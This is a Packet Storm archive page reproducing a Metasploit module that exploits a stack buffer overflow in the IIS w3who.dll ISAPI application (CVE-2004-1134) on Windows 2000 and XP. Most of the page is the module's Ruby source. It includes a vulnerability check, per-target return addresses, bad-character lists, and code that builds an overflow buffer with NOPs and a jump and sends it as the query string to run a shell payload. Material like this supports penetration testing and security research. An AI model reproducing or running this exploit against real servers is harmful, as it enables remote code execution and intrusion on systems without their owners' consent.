all things security

Microsoft IIS ISAPI w3who.dll Query String Overflow

Microsoft IIS ISAPI w3who.dll Query String Overflow
Posted Nov 26, 2009
Authored by H D Moore | Site metasploit.com

This Metasploit module exploits a stack overflow in the w3who.dll ISAPI application. This vulnerability was discovered Nicolas Gregoire and this code has been successfully tested against Windows 2000 and Windows XP (SP2). When exploiting Windows XP, the payload must call RevertToSelf before it will be able to spawn a command shell.

tags | exploit, overflow, shell
systems | windows, 2k, xp
advisories | CVE-2004-1134
MD5 | 89125aafc4fb654536650e438ab573ca

Microsoft IIS ISAPI w3who.dll Query String Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft IIS ISAPI w3who.dll Query String Overflow',
'Description' => %q{
This module exploits a stack overflow in the w3who.dll ISAPI
application. This vulnerability was discovered Nicolas
Gregoire and this code has been successfully tested against
Windows 2000 and Windows XP (SP2). When exploiting Windows
XP, the payload must call RevertToSelf before it will be
able to spawn a command shell.

},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-1134'],
[ 'OSVDB', '12258'],
[ 'URL', 'http://www.exaprobe.com/labs/advisories/esa-2004-1206.html'],
[ 'BID', '11820'],

],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 632,
'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
'MinNops' => 128,
'StackAdjustment' => -3500,

},
'Platform' => 'win',
'Targets' =>
[
['Windows 2000 RESKIT DLL [Windows 2000]', { 'Rets' => [ 48, 0x01169f4a ] }], # pop, pop, ret magic
['Windows 2000 RESKIT DLL [Windows XP]', { 'Rets' => [ 748, 0x10019f4a ] }], # pop, pop, ret magic
],
'DisclosureDate' => 'Dec 6 2004'))

register_options(
[
OptString.new('URL', [ true, "The path to w3who.dll", "/scripts/w3who.dll" ]),
], self.class)
end

# Identify the target based on the IIS version
def autofilter
res = send_request_raw({
'uri' => datastore['URL']
}, -1)

# Was a vulnerable system detected?
if (res and res.body =~ /Access Token/)
case res.headers['Server']
when /5\.1/
datastore['TARGET'] = 1
else
datastore['TARGET'] = 0
end

return true
end

# Not vulnerable
return false
end

def check
res = send_request_raw({
'uri' => datastore['URL']
}, -1)

if (res and res.body =~ /Access Token/)
return Exploit::CheckCode::Vulnerable
end

return Exploit::CheckCode::Safe
end

def exploit

buf = rand_text_english(8192, payload_badchars)
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
buf[target['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded

print_status("Sending request...")
r = send_request_raw({
'uri' => datastore['URL'],
'query' => buf
}, 5)

handler
end

end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    15 Files
  • 20
    Jul 20th
    15 Files
  • 21
    Jul 21st
    15 Files
  • 22
    Jul 22nd
    7 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close